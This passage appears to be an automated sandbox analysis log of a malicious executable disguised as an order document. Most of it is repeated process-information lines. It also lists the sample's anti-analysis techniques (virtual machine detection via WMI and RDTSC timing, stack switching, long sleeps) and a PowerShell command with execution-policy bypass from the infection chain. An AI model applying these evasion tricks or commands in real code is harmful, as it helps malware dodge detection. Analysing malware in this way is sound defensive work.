Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	API/Special instruction interceptor: Address: 3AA9A2C
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	API/Special instruction interceptor: Address: 2749A2C

Tries to detect virtualization through RDTSC time measurements

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	RDTSC instruction interceptor: First address: 3A45131 second address: 3A45131 instructions: 0x00000000 rdtsc 0x00000002 cmp ax, 0000E78Bh 0x00000006 cmp ebx, ecx 0x00000008 jc 00007EFC587F3153h 0x0000000a cmp ax, dx 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	RDTSC instruction interceptor: First address: 26E5131 second address: 26E5131 instructions: 0x00000000 rdtsc 0x00000002 cmp ax, 0000E78Bh 0x00000006 cmp ebx, ecx 0x00000008 jc 00007EFC593550B3h 0x0000000a cmp ax, dx 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Memory allocated: 34E00000 memory reserve \| memory write watch	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Memory allocated: 34D00000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7749			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1993			Jump to behavior

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj41C4.tmp\System.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep count: 7749 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep count: 1993 > 30	Jump to behavior

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Objedn vka_20248481119000903.exe, 00000009.00000002.2919321203.0000000004957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: Objedn vka_20248481119000903.exe, 00000009.00000002.2919321203.000000000499B000.00000004.00000020.00020000.00000000.sdmp, Objedn vka_20248481119000903.exe, 00000009.00000002.2919321203.00000000049AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process token adjusted: Debug			Jump to behavior

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)			Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process created: \Device\CdRom1\Objedn vka_20248481119000903.exe "E:\Objedn vka_20248481119000903.exe"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
